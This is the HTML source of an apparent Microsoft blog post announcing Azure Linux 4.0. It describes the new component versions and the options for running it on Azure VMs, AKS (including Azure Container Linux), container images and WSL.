&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Why Azure Linux&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Running Linux on Azure often involves a mix of distributions - one for VMs, another for Kubernetes nodes, a third for container base images, and sometimes something different on developer machines. That flexibility is powerful, but it can also introduce operational overhead: multiple patch schedules to coordinate, multiple security baselines to validate, and more moving parts for SRE and security teams to stay ahead of. A more consistent baseline - especially one with a smaller footprint - can help reduce exposure and simplify day&lt;/SPAN&gt;‑&lt;SPAN data-contrast="auto"&gt;to&lt;/SPAN&gt;‑&lt;SPAN data-contrast="auto"&gt;day maintenance&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux was built with that principle in mind: a single, Microsoft-supported Linux foundation designed to work across every Azure compute surface. From kernel updates to CVE patches, Azure Linux is built and maintained by Microsoft with a predictable update cadence designed around Azure infrastructure. Azure Linux is included with Azure compute at no additional cost.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;What Is Azure Linux 4.0&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux is a Fedora-derived, RPM-based Linux distribution built and maintained by Microsoft. It is open source, free to use, and optimized specifically for Azure. &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;Minimal by choice, secure by default;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; Azure Linux ships only the packages required for cloud workloads. Azure Linux is built exclusively for cloud and server workloads, it is not intended to support desktop usage or GUI applications. &lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux already powers &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;millions of cores&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; across Azure's internal services, including AKS, Azure SQL, Azure Cosmos DB, and many others. With 4.0, we're bringing the same OS - same security posture, same performance tuning, same operational simplicity - to every Azure customer.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;When Azure Linux 4.0 reaches General Availability, you can expect seamless integration with the Azure services you already rely on, including:&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="1" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Microsoft Defender for Cloud -&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; vulnerability assessment and threat detection&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="2" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Azure Monitor -&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; telemetry, logs, and performance monitoring&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="3" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Azure Migrate -&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; discovery and migration tooling&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="4" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Trusted Launch and Secure Boot -&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; hardware-rooted security&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="5" data-aria-level="1"&gt;&lt;SPAN data-contrast="auto"&gt;Azure Portal, CLI, ARM, Bicep, Terraform, Ansible&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; -deploy and manage with your existing tools&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;What's New in Azure Linux 4.0&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Component&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Version&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;What Changed&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Kernel&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;6.18 LTS&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure-tuned with new hardware drivers, improved Hyper-V integration, GPU/AI accelerator support&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Package Manager&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;dnf5&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Complete rewrite from python to reduce dependencies, faster package resolution, lower memory usage&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;glibc&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;2.42&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;This includes performance improvements in string ops, memory allocation, thread handling&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;OpenSSL&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;3.5&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;This release includes post-quantum cryptography support, improved QUIC support, and other crypto updates.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;systemd&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;258&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Faster boot sequences, improved service management&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Python&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;3.14&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;JIT compiler, new syntax features&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;RPM&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;6.0&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Modernized database backend, improved signature verification&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;FIPS 140-3&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;In progress&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Will be available at GA.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:259}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Azure Linux &lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;on &lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Virtual Machines&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Deploy Azure Linux 4.0 directly from the Azure Marketplace on any Azure VM or VM Scale Set. Azure Linux images are validated across Azure VM SKUs and tuned for Azure compute, storage, and networking delivering &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;faster VM startup and provisioning&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; with a reduced package footprint.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Whether you're running web applications, databases, or GPU-accelerated AI/ML workloads, Azure Linux provides a consistent, secure foundation with &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;no additional OS licensing cost&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;. You pay only for the underlying Azure compute resources.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Deploy your first Azure Linux VM in minutes from the &lt;/SPAN&gt;&lt;A href="https://marketplace.microsoft.com/en-us/product/microsoftazurelinux.azurelinux-4?tab=Overview" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Azure &lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Marketplace&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Azure Linux &lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;on &lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Azure Kubernetes Service&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux has been the container host for AKS since 2023, already powering mission-critical Kubernetes workloads at massive scale. With 4.0, we're also introducing &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;Azure Container Linux (ACL)&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; an immutable, container optimized variant for environments with stricter security and compliance requirements. To learn more about Azure Container Linux, see&amp;nbsp;&lt;A class="lia-external-url" href="http://aka.ms/azurecontainerlinux-blog" target="_blank" rel="noopener"&gt;ACL blogpost&lt;/A&gt;.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Linux (General purpose)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Azure Container Linux (ACL)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Update model&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Package-based (dnf5)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Image-based, immutable, auto-updating&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Customization&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Full package management&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Locked-down, minimal surface&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Best for&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;General AKS workloads&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Regulated, high-security environments&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;SELinux&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Supported&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Enforcing by default&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Both options share the same kernel, security update cadence, and Azure integration; fully supported by Microsoft, end to end.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Azure Linux Container Images&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Build and run containerized applications on Microsoft-maintained base images from the same Azure Linux supply chain. &lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;One Linux experience from VMs to containers with the&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; same security updates, same compliance posture, and same operational model.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Image Type&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Use Case&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Base&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Full flexibility - install any packages you need&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Runtime (Python, Node.js, Java, .NET)&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt; [Not available at Preview]&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Pre-configured for your language stack&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Distroless&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Minimal attack surface - no shell, no package manager&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;All images are available on Microsoft Container Registry (MCR) and follow the same monthly security update cadence as Azure Linux VM images.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P aria-level="2"&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Azure Linux on WSL&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559738&amp;quot;:300,&amp;quot;335559739&amp;quot;:100}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Familiar Linux, optimized for Azure.&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt; Develop locally on the same Linux you run in production. Azure Linux for Windows Subsystem for Linux brings your production OS to your developer workstation, eliminating environment drift and giving your team a consistent dev-to-cloud workflow.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;335559739&amp;quot;:120}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
